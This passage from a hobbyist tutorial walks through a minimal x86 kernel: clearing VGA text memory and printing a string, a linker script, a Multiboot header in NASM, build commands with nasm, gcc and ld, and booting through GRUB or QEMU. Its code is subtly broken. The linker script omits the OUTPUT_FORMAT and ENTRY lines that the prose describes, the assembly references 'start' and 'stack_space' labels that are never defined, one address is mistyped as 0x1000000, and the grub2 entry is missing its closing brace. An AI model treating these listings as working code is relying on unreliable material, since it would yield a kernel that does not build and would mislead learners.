		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		i = i + 2;

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory mapped input/output for the screen starts at 0xb8000 and supports 25 lines, each line contain 80 ascii characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.


In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.


The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

*  link.ld
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have look at the next line .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become
0x1000000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the then values of location-counter.


Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a boot loader; called as Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as Multiboot header) within its first 8 KiloBytes.

Further, This Multiboot header must contain 3 fields that are 4 byte aligned namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.

So our kernel.asm will become:


;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The ’-c ’ option makes sure that after compiling, linking doesn’t implicitly happen.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.


Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro


Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:


That’s your kernel!!



* It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking. * To run this on grub2 which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro


* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel